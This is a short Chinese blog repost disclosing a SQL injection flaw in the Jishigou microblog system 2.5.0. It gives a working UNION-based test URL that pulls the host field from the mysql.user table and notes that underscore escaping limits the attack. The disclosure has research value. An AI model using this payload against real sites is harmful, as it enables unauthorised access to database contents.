当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

记事狗2.5.0鸡肋注入漏洞

时间:2015/5/19 19:19:07 作者:平凡之路 来源:xuhantao.com 浏览:

无意中发现的,只测试了“记事狗微博客系统2.5.0 UTF8 Build 20110130”
 
因为系统会将”_” 转换为”\_” 所以像”load_file”、有表前缀的都不行,暂时没想到办法去绕过,作为技术挑战吧。
 
测试方法:
 
/index.php?code=usertag&mod=search&usertag=1″/**/and/**/1=2/**/union/**/select/**/1,2,host,4/**/from/**/mysql.user%23
 
EXP不会造成严重影响,且仅供研究之用

摘自 疯子博客|Madman@SysCiC.TeAm ,www.xuhantao.com,涛涛电脑知识

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1